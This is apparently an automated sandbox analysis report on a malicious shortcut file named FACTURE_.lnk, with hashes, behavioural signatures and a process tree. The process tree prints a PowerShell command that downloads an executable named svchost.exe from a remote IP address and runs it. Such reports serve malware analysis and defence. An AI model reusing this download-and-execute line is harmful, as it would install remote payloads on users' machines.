Analysis
-
max time kernel
21s -
max time network
46s -
platform
windows7_x64 -
resource
win7-20220718-en -
resource tags
arch:x64arch:x86image:win7-20220718-enlocale:en-usos:windows7-x64system -
submitted
19-07-2022 14:46
Static task
static1
Behavioral task
behavioral1
Sample
FACTURE_.lnk
Resource
win7-20220718-en
windows7-x64
4 signatures
150 seconds
General
-
Target
FACTURE_.lnk
-
Size
1012B
-
MD5
60cddf458ccce0249bc3654f282f7b2e
-
SHA1
19a6ab379f925509d7cc36524c716877f4a268a0
-
SHA256
b0cf721309f7ea1684e2593a3e3c98f080146274432f39c9e2d2982ba1c9da95
-
SHA512
cd86c8e423ad3eaad92e67241896976c5e02ecea5d0c2dafef08e17eb6786fae0682d5bd0e59897b06faf06a3cef4a3883c03331c450574ae753bba6477bda91
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1476 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1476 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 1732 wrote to memory of 1476 1732 cmd.exe powershell.exe PID 1732 wrote to memory of 1476 1732 cmd.exe powershell.exe PID 1732 wrote to memory of 1476 1732 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\FACTURE_.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:1732 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest -Uri 'http://52.149.215.0/svchost.exe' -OutFile $env:temp\file.exe; set a=ec; start $env:temp\file.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1476
-